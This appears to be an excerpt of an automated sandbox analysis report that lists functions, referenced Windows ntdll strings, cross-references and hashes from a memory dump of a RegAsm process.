Instruction Fuzzy Hash: 8B024DF5D002689FDF21DB14CCC0BEAB7B8AB44714F0445EAA649E7241DB71AE84CF69

Function 033F8B42 Relevance: 12.6, Strings: 10, Instructions: 146COMMON

Download Yara Rule

Strings

heapType, xrefs: 033F8BCB
http://schemas.microsoft.com/SMI/2020/WindowsSettings, xrefs: 033F8BD0
services.exe, xrefs: 033F8B96
csrss.exe, xrefs: 033F8B80
svchost.exe, xrefs: 033F8B68
lsass.exe, xrefs: 033F8BA1
SegmentHeap, xrefs: 033F8BE9
DefaultBrowser_NOPUBLISHERID, xrefs: 033F8D00
smss.exe, xrefs: 033F8B8B
runtimebroker.exe, xrefs: 033F8B73

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
API String ID: 0-2515994595
Opcode ID: 4918e5c2e2c8f848cad4f3e7059d88c487968d204fc92802782d0a75aad11f73
Instruction ID: 18aaefad218fc5f81463e136ef8c22280be252b530560547acdc1462106e1160
Opcode Fuzzy Hash: 4918e5c2e2c8f848cad4f3e7059d88c487968d204fc92802782d0a75aad11f73
Instruction Fuzzy Hash: 6C51CE755153119FD328DF1988C4BABBBECBF84740F58492DFA588B241E770D504C792

Function 03400274 Relevance: 10.3, Strings: 8, Instructions: 348COMMON

Download Yara Rule

Strings

RtlReAllocateHeap, xrefs: 034002BF, 03400362
About to rellocate block at %p to 0x%Ix bytes with tag %ws, xrefs: 034004D3
Invalid allocation size - %Ix (exceeded %Ix), xrefs: 034006EA
HEAP: , xrefs: 034003A6, 034004B5, 034005DD, 03400682, 034006D9
About to reallocate block at %p to %Ix bytes, xrefs: 034003BA
Just reallocated block at %p to 0x%Ix bytes with tag %ws, xrefs: 0340069F
Just reallocated block at %p to %Ix bytes, xrefs: 034005F1
HEAP[%wZ]: , xrefs: 03400399, 034004A8, 034005D0, 03400675, 034006CC

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: About to reallocate block at %p to %Ix bytes$About to rellocate block at %p to 0x%Ix bytes with tag %ws$HEAP: $HEAP[%wZ]: $Invalid allocation size - %Ix (exceeded %Ix)$Just reallocated block at %p to %Ix bytes$Just reallocated block at %p to 0x%Ix bytes with tag %ws$RtlReAllocateHeap
API String ID: 0-1700792311
Opcode ID: f9c163b6f18251ba8b4a03e1c344f4891f26bed8c075483840314f00ee4c6513
Instruction ID: 8c75354d78a46aad648decda3202096fe071130aedb36770dd4590588489a20d
Opcode Fuzzy Hash: f9c163b6f18251ba8b4a03e1c344f4891f26bed8c075483840314f00ee4c6513
Instruction Fuzzy Hash: 6CD16D39A00685EFDB15DFA8C481BAEFBF1EF46614F08806AE4559F792C734E941CB18

Function 033D89B3 Relevance: 9.0, Strings: 7, Instructions: 259COMMON

Download Yara Rule

Strings

AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled, xrefs: 033D8A3D
AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error., xrefs: 033D8A67
VerifierDebug, xrefs: 033D8CA5
VerifierFlags, xrefs: 033D8C50
HandleTraces, xrefs: 033D8C8F
AVRF: -*- final list of providers -*- , xrefs: 033D8B8F
VerifierDlls, xrefs: 033D8CBD

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: AVRF: %ws: pid 0x%X: application verifier will be disabled due to an initialization error.$AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled$AVRF: -*- final list of providers -*- $HandleTraces$VerifierDebug$VerifierDlls$VerifierFlags
API String ID: 0-3223716464
Opcode ID: f2707d5ee959cf489334614df5898994ccc97befdfce23078e0f7d9e187558b0
Instruction ID: 4b10951418f279ef96d7b46fd2ac8dd976cabb92ce94b4ece8d3aba9798b1a0c
Opcode Fuzzy Hash: f2707d5ee959cf489334614df5898994ccc97befdfce23078e0f7d9e187558b0
Instruction Fuzzy Hash: 49911077A45711AFDB21EF68A8C0B5AB7E8FF46A10F0944A9F9416F281C730BC00CB95

Function 0335EA80 Relevance: 8.6, Strings: 6, Instructions: 1073COMMON

Download Yara Rule

Strings

LdrpResSearchResourceInsideDirectory Enter, xrefs: 0335EB58
{, xrefs: 033B4643
R, xrefs: 0335EB62
T, xrefs: 0335EB4E
, xrefs: 0335F299
LdrpResSearchResourceInsideDirectory Exit, xrefs: 0335EB6C

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: $LdrpResSearchResourceInsideDirectory Enter$LdrpResSearchResourceInsideDirectory Exit$R$T${
API String ID: 0-1109411897
Opcode ID: 03d336afe9e396c5603dd8be3c7697eb8d19782c44355fa9dcf6521c9a7a85bd
Instruction ID: ff8b33c4aa10cba9eb7552493e371340c5a8c0ae17808af81941e226f4d2b51e
Opcode Fuzzy Hash: 03d336afe9e396c5603dd8be3c7697eb8d19782c44355fa9dcf6521c9a7a85bd
Instruction Fuzzy Hash: B9A22574A0562ACFDB64DF19CCC8BA9B7B5AF44304F1842E9E909A7691DB309EC4CF44

Function 033863FF Relevance: 7.8, Strings: 6, Instructions: 261COMMON

Download Yara Rule

Strings

Delaying execution failed with status 0x%08lx, xrefs: 033C4258
minkernel\ntdll\ldrinit.c, xrefs: 033C40E9, 033C414B, 033C420F, 033C4269
LDR:MRDATA: Process initialization failed with status 0x%08lx, xrefs: 033C40D8
_LdrpInitialize, xrefs: 033C40DF, 033C4141, 033C4205, 033C425F
NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop, xrefs: 033C41FE
Process initialization failed with status 0x%08lx, xrefs: 033C413A

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: Delaying execution failed with status 0x%08lx$LDR:MRDATA: Process initialization failed with status 0x%08lx$NtWaitForSingleObject failed with status 0x%08lx, fallback to delay loop$Process initialization failed with status 0x%08lx$_LdrpInitialize$minkernel\ntdll\ldrinit.c
API String ID: 0-792281065
Opcode ID: 9327e9b991a9100d9663003c2970a453a99819a83debab3233a04243f4024299
Instruction ID: 361724b3ffaf7e2d37b83ea68ac2455e0df74b1c950be0b85f7c05880750e9e1
Opcode Fuzzy Hash: 9327e9b991a9100d9663003c2970a453a99819a83debab3233a04243f4024299
Instruction Fuzzy Hash: 90915478E013549FEB25EF55DDD6BAEB7A8AF01B24F08406DE910BF681DB749840C790

Function 0334645D Relevance: 7.6, Strings: 6, Instructions: 150COMMON

Download Yara Rule

Strings

Building shim user DLL system32 filename failed with status 0x%08lx, xrefs: 033A99ED
Loading the shim user DLL failed with status 0x%08lx, xrefs: 033A9A2A
minkernel\ntdll\ldrinit.c, xrefs: 033A9A11, 033A9A3A
apphelp.dll, xrefs: 03346496
LdrpInitShimEngine, xrefs: 033A99F4, 033A9A07, 033A9A30
Getting the shim user exports failed with status 0x%08lx, xrefs: 033A9A01

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: Building shim user DLL system32 filename failed with status 0x%08lx$Getting the shim user exports failed with status 0x%08lx$LdrpInitShimuser$Loading the shim user DLL failed with status 0x%08lx$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-204845295
Opcode ID: 7cd298a3efc4d25633d4af22ddf1dedc58fd8e4a3bcfc369f1a2cdc4bb4bc948
Instruction ID: 968412184a333f6ce903f0633eb54301e5867d1c06a155db2f2bb19310e300d5
Opcode Fuzzy Hash: 7cd298a3efc4d25633d4af22ddf1dedc58fd8e4a3bcfc369f1a2cdc4bb4bc948
Instruction Fuzzy Hash: 8751C4796187049FD324EF28D8C1B6BB7E8EF85A44F04492EF595AB161DB30E904CB92

Function 03382674 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx, xrefs: 033C219F
SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx, xrefs: 033C2178
RtlGetAssemblyStorageRoot, xrefs: 033C2160, 033C219A, 033C21BA
SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p, xrefs: 033C21BF
SXS: %s() passed the empty activation context, xrefs: 033C2165
SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx, xrefs: 033C2180

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: RtlGetAssemblyStorageRoot$SXS: %s() bad parameters AssemblyRosterIndex 0x%lx >= AssemblyRosterHeader->EntryCount: 0x%lx$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: AssemblyRosterIndex: 0x%lxSXS: AssemblyStorageRoot: %pSXS: Callback : %p$SXS: %s() passed the empty activation context$SXS: RtlGetAssemblyStorageRoot() unable to get activation context data, storage map and assembly roster header. Status = 0x%08lx$SXS: RtlGetAssemblyStorageRoot() unable to resolve storage map entry. Status = 0x%08lx
API String ID: 0-861424205
Opcode ID: cdf3744a40c2daa2762714514a9ee4ace2135a6882e59309dc5a757e0abe22a2
Instruction ID: 439e5c571dde1f8ffae3f7c89206995ccb1fc851defd4f3a52ff8222a5843ca9
Opcode Fuzzy Hash: cdf3744a40c2daa2762714514a9ee4ace2135a6882e59309dc5a757e0abe22a2
Instruction Fuzzy Hash: 043124BAF403546BEB20EB958CC5F5FB678DB96A40F094859FA05EB202D270DE00C3A0

Function 0338C6A6 Relevance: 7.6, Strings: 6, Instructions: 110COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrredirect.c, xrefs: 033C8181, 033C81F5
LdrpInitializeImportRedirection, xrefs: 033C8177, 033C81EB
Unable to build import redirection Table, Status = 0x%x, xrefs: 033C81E5
Loading import redirection DLL: '%wZ', xrefs: 033C8170
minkernel\ntdll\ldrinit.c, xrefs: 0338C6C3
LdrpInitializeProcess, xrefs: 0338C6C4

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: LdrpInitializeImportRedirection$LdrpInitializeProcess$Loading import redirection DLL: '%wZ'$Unable to build import redirection Table, Status = 0x%x$minkernel\ntdll\ldrinit.c$minkernel\ntdll\ldrredirect.c
API String ID: 0-475462383
Opcode ID: 0ce5a628d6cf2fb7151e4a89a3d5e94c50cd1af82f8b1d02e0e86060d3460720
Instruction ID: bc6fa1500ca86d61b12fef39aa6d3037fee841c31d4b0b82142232f7b2d1518f
Opcode Fuzzy Hash: 0ce5a628d6cf2fb7151e4a89a3d5e94c50cd1af82f8b1d02e0e86060d3460720
Instruction Fuzzy Hash: 3D31E67AA443459FD210EF28DDC5E1AB7D4EF85B10F084568F985AF291E724DD04C7A2

Function 0339096E Relevance: 6.6, APIs: 4, Instructions: 606COMMON

Download Yara Rule

APIs

Part of subcall function 03392DF0: LdrInitializeThunk.NTDLL ref: 03392DFA

__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03390BA3
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03390BB6
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03390D60
__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 03390D74

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$InitializeThunk
String ID:
API String ID: 1404860816-0
Opcode ID: 50ea8c8db8025b5d3e694580df1c6569f112ea79537e8f23a89ca791c78ab961
Instruction ID: 71080a4bd653ca5d5362271d027b8b43845ef9e8e3a67aebcb5d29b3a00154b9
Opcode Fuzzy Hash: 50ea8c8db8025b5d3e694580df1c6569f112ea79537e8f23a89ca791c78ab961
Instruction Fuzzy Hash: 88426B75900755DFEB24CF24C880BAAB7F9FF04314F1445AAE999EB241E770AA84CF60

Function 0335A3C0 Relevance: 5.3, Strings: 4, Instructions: 290COMMON

Download Yara Rule

Strings

6, xrefs: 0335A3F7
8, xrefs: 0335A3E7
LdrResFallbackLangList Enter, xrefs: 0335A3EF
LdrResFallbackLangList Exit, xrefs: 0335A3FF

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: 6$8$LdrResFallbackLangList Enter$LdrResFallbackLangList Exit
API String ID: 0-379654539
Opcode ID: 66476c4ee1238abf1b6b9d4f0bd2760735793dd7a96579faf271bdc23757a18b
Instruction ID: b585ec9f34a2c7b2c62da5e3ee1dbb0ab0307294651b564f4d8ec8778c5d0fc8
Opcode Fuzzy Hash: 66476c4ee1238abf1b6b9d4f0bd2760735793dd7a96579faf271bdc23757a18b
Instruction Fuzzy Hash: 11C168B45083868FD712CF58C480BAAB7F8BF88704F044A6AF995CB750E735CA49DB56

Function 03388402 Relevance: 5.3, Strings: 4, Instructions: 263COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 03388421
\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers, xrefs: 0338855E
@, xrefs: 03388591
LdrpInitializeProcess, xrefs: 03388422

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: @$LdrpInitializeProcess$\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers$minkernel\ntdll\ldrinit.c
API String ID: 0-1918872054
Opcode ID: 877939e4973dc6761fe72ec2b816c1e0f25a009563cdb571181a9cdc5080a70e
Instruction ID: 077f5942ddc24687a0f6a0ce21a1f671aba934482d2c01b29dca0d17fac63079
Opcode Fuzzy Hash: 877939e4973dc6761fe72ec2b816c1e0f25a009563cdb571181a9cdc5080a70e
Instruction Fuzzy Hash: 0D917E75919344AFEB21EF21CCC0EAFB6ECAF84754F84492EF6849A150E334D9448B52

Function 0338273C Relevance: 5.2, Strings: 4, Instructions: 249COMMON

Download Yara Rule

Strings

SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p, xrefs: 033C22B6
RtlpGetActivationContextDataStorageMapAndRosterHeader, xrefs: 033C21D9, 033C22B1
.Local, xrefs: 033828D8
SXS: %s() passed the empty activation context, xrefs: 033C21DE

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: .Local$RtlpGetActivationContextDataStorageMapAndRosterHeader$SXS: %s() bad parameters:SXS: Flags : 0x%lxSXS: Peb : %pSXS: ActivationContextData: %pSXS: AssemblyStorageMap : %p$SXS: %s() passed the empty activation context
API String ID: 0-1239276146
Opcode ID: 2ec033ae37a20da20d2d0eaa696ae1af034f9e73829286e015b8d9593c9e03b6
Instruction ID: 3b96c3c796c5305eeb17c3cb167326c7c928c09ac7d5159ed2acbc37dd520e59
Opcode Fuzzy Hash: 2ec033ae37a20da20d2d0eaa696ae1af034f9e73829286e015b8d9593c9e03b6
Instruction Fuzzy Hash: 9FA16C359013299BDF24DF64DCC4BAAB3B5AF58314F1949EAE808EB251D7709E81CF90

Function 03384AD0 Relevance: 5.2, Strings: 4, Instructions: 228COMMON

Download Yara Rule

Strings

SXS: %s() called with invalid cookie type 0x%08Ix, xrefs: 033C3437
SXS: %s() called with invalid flags 0x%08lx, xrefs: 033C342A
RtlDeactivateActivationContext, xrefs: 033C3425, 033C3432, 033C3451
SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix, xrefs: 033C3456

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: RtlDeactivateActivationContext$SXS: %s() called with invalid cookie tid 0x%08Ix - should be %08Ix$SXS: %s() called with invalid cookie type 0x%08Ix$SXS: %s() called with invalid flags 0x%08lx
API String ID: 0-1245972979
Opcode ID: 98fce4ef3880d8557a4f1a546a14360a362c7f4a91d33a77aebdf74dfcbf2c04
Instruction ID: 07fcb7a6bf41079ca98af0e3d889d4daf3432ec1aaf68d4e109d1ad0c129624f
Opcode Fuzzy Hash: 98fce4ef3880d8557a4f1a546a14360a362c7f4a91d33a77aebdf74dfcbf2c04
Instruction Fuzzy Hash: 03610336654B529FC722DF19CCC1B6AF3A9AF80B20F18855DE8A59FA50D734EC40CB91

Function 033564AB Relevance: 5.2, Strings: 4, Instructions: 211COMMON

Download Yara Rule

Strings

ThreadPool: callback %p(%p) returned with preferred languages set, xrefs: 033B106B
ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 033B1028
ThreadPool: callback %p(%p) returned with background priorities set, xrefs: 033B10AE
ThreadPool: callback %p(%p) returned with a transaction uncleared, xrefs: 033B0FE5

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
API String ID: 0-1468400865
Opcode ID: 53bc9629d8ab1e707ad31803f3c3060e9d52ebd9ed85288b1d4dd6bd24407df1
Instruction ID: e5cc5fd6505d4a35853d9a27d5665977aba60b7c755d0fd2f374d298a6a936d4
Opcode Fuzzy Hash: 53bc9629d8ab1e707ad31803f3c3060e9d52ebd9ed85288b1d4dd6bd24407df1
Instruction Fuzzy Hash: 2671D9B5944304AFDB20DF14C8C5F9B7BA8AF84764F840969FD498B286D734D188CBD2

Function 0337245A Relevance: 5.1, Strings: 4, Instructions: 111COMMON

Download Yara Rule

Strings

Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 033BA992
minkernel\ntdll\ldrinit.c, xrefs: 033BA9A2
LdrpDynamicShimModule, xrefs: 033BA998
apphelp.dll, xrefs: 03372462

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
API String ID: 0-176724104
Opcode ID: a5eb853e166e6da07e69ed08d1a1c134de1075981b84e87dc7d5f198e52aa1e3
Instruction ID: d43cf572897470b9f0e565ea1272fc55d06c1b977dcc4c30498bbf3095d7415f
Opcode Fuzzy Hash: a5eb853e166e6da07e69ed08d1a1c134de1075981b84e87dc7d5f198e52aa1e3
Instruction Fuzzy Hash: CA312679A00305EBDB20EF58DCC1AAAB7F8FB81B00F1A4069F911BF645D7749881DB90

Function 033629A0 Relevance: 4.7, Strings: 3, Instructions: 966COMMON

Download Yara Rule

Strings

Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 0336327D
HEAP: , xrefs: 03363264
HEAP[%wZ]: , xrefs: 03363255

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
API String ID: 0-617086771
Opcode ID: 3e4709a61fed23a5ad7f84ffe1c1c3dac804bb77a3d22420bfd16ab225dce1ca
Instruction ID: 6a392a0f6d7edd44922aae3a4ac89550d35f8d96869aaf0cd03343007d687343
Opcode Fuzzy Hash: 3e4709a61fed23a5ad7f84ffe1c1c3dac804bb77a3d22420bfd16ab225dce1ca
Instruction Fuzzy Hash: 3D92CC74E042489FDB25CF68C8807AEBBF5EF48310F19C4A9E886AB765D735A941CF50

Function 03360770 Relevance: 4.2, Strings: 3, Instructions: 414COMMON

Download Yara Rule

Strings

HEAP: , xrefs: 033B50BD
HEAP[%wZ]: , xrefs: 033B50AE
(UCRBlock->Size >= *Size), xrefs: 033B50CA

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
API String ID: 0-4253913091
Opcode ID: b771007f7099557632c03cf6b5799e37eb3aba79f633dfa532607d259e75c2d8
Instruction ID: 9def84e2d7c860b6a7148067657707ecc89b5bc0e9855e293d7f4841ed029cd3
Opcode Fuzzy Hash: b771007f7099557632c03cf6b5799e37eb3aba79f633dfa532607d259e75c2d8
Instruction Fuzzy Hash: 92F1DE34A04605DFEB18CF68C8C1BAAB7F9FF45300F1881A9E5569B795D734E981CB90

Function 03376962 Relevance: 4.0, Strings: 2, Instructions: 1492COMMON

Download Yara Rule

Strings

, xrefs: 033BCA51
@, xrefs: 03376C24

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID: InitializeThunk
String ID: $@
API String ID: 2994545307-1077428164
Opcode ID: 86c805e28bc7af6f1a74088214349c2f862e21e0f1f448cfa8e82bf6f73006f9
Instruction ID: 0a4e7cd851a68ef2ecadb829404239dbdeef9539623252a09a477ee0a45db637
Opcode Fuzzy Hash: 86c805e28bc7af6f1a74088214349c2f862e21e0f1f448cfa8e82bf6f73006f9
Instruction Fuzzy Hash: 5BC26D71A087419FDB35CF24C881BABBBE9AF88754F08896DF989C7250D738D845CB52

Function 0334A197 Relevance: 4.0, Strings: 3, Instructions: 238COMMON

Download Yara Rule

Strings

FilterFullPath, xrefs: 033AC2E6
UseFilter, xrefs: 0334A1C1
\??\, xrefs: 033AC1E4

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: FilterFullPath$UseFilter$\??\
API String ID: 0-2779062949
Opcode ID: 233cadc622baef41f49d984c1d48c7d8975acd31d73c0e8ad804ba32ce8d4306
Instruction ID: f0a69f9a856443b2845417f91662719350aa96777062ddce62b2796008563d7f
Opcode Fuzzy Hash: 233cadc622baef41f49d984c1d48c7d8975acd31d73c0e8ad804ba32ce8d4306
Instruction Fuzzy Hash: E8A15A76D016299BDB31DB28CCC8BAAB7B8EF44710F1441EAE909EB250D7359E84CF50

Function 03370BCB Relevance: 4.0, Strings: 3, Instructions: 210COMMON

Download Yara Rule

Strings

minkernel\ntdll\ldrinit.c, xrefs: 033BA121
Failed to allocated memory for shimmed module list, xrefs: 033BA10F
LdrpCheckModule, xrefs: 033BA117

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
API String ID: 0-161242083
Opcode ID: b4fae0649b324280c606c091def30e7be354666a072c13a86cf7d75897c92cd4
Instruction ID: ab4716820179ec28acdd80388d5f700a544cf2759dc4c1c7d06b46a0a1e0b72c
Opcode Fuzzy Hash: b4fae0649b324280c606c091def30e7be354666a072c13a86cf7d75897c92cd4
Instruction Fuzzy Hash: 8771C178E00605DFDB28EFA8CDC1AAEB7F8EB44604F19406DD912EF654E738A941CB50

Function 03360A5B Relevance: 3.9, Strings: 3, Instructions: 190COMMON

Download Yara Rule

Strings

((PHEAP_ENTRY)LastKnownEntry <= Entry), xrefs: 033B534D
HEAP: , xrefs: 033B5342
HEAP[%wZ]: , xrefs: 033B5335

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
API String ID: 0-1334570610
Opcode ID: 1d856f095fd77428150e06670c7068c0ac5ad12fddde37a859ac1cb75d4efd3c
Instruction ID: 88077b918c02e088b5b72fa86d1f38081c7b24b87aab796c5aee0af417dc24ee
Opcode Fuzzy Hash: 1d856f095fd77428150e06670c7068c0ac5ad12fddde37a859ac1cb75d4efd3c
Instruction Fuzzy Hash: 98619E746043419FDB19CF28C881B6ABBE5FF45708F18C49EE4998F696D770E881CB91

Function 0338C720 Relevance: 3.9, Strings: 3, Instructions: 141COMMON

Download Yara Rule

Strings

Failed to reallocate the system dirs string !, xrefs: 033C82D7
minkernel\ntdll\ldrinit.c, xrefs: 033C82E8
LdrpInitializePerUserWindowsDirectory, xrefs: 033C82DE

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: Failed to reallocate the system dirs string !$LdrpInitializePerUserWindowsDirectory$minkernel\ntdll\ldrinit.c
API String ID: 0-1783798831
Opcode ID: 5c535547c595f355fd84a8dbd0922c22b3f4ef2ddb682809394cc6c29e40ff4b
Instruction ID: c898d7de43aa0210fa65b0e0a066b55daeb9a7a36bce34a37610368e916c21e3
Opcode Fuzzy Hash: 5c535547c595f355fd84a8dbd0922c22b3f4ef2ddb682809394cc6c29e40ff4b
Instruction Fuzzy Hash: 4741CDBA950300AFD720FB64DCC4B5BB7E8EB45A50F05493AF948EB264E774D800CBA1

Function 0340C188 Relevance: 3.9, Strings: 3, Instructions: 123COMMON

Download Yara Rule

Strings

PreferredUILanguages, xrefs: 0340C212
@, xrefs: 0340C1F1
\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0340C1C5

Memory Dump Source

Source File: 00000007.00000002.2236865702.0000000003320000.00000040.00001000.00020000.00000000.sdmp, Offset: 03320000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_3320000_RegAsm.jbxd

Similarity

API ID:
String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
API String ID: 0-2968386058
Opcode ID: 17516e6c36f79f8f765836710375985faadd52249e5e6ceb3e20fc5dedd9e92c
Instruction ID: 5fde4dc8e251da1c3617d328f7d1b18569044cece65379f2f7df8be3d201b8fb
Opcode Fuzzy Hash: 17516e6c36f79f8f765836710375985faadd52249e5e6ceb3e20fc5dedd9e92c
Instruction Fuzzy Hash: DA415976E00209EBDF11DBD8C8C1BEEB7B8AB14700F14427BE915AF6A0D7749E458B94

Function 033E4144 Relevance: 3.9, Strings: 3, Instructions: 121COMMON

Download Yara Rule

Strings

LdrpResValidateFilePath Exit, xrefs: 033E4172
@, xrefs: 033E4225
LdrpResValidateFilePath Enter, xrefs: 033E4160

Memory Dump Source

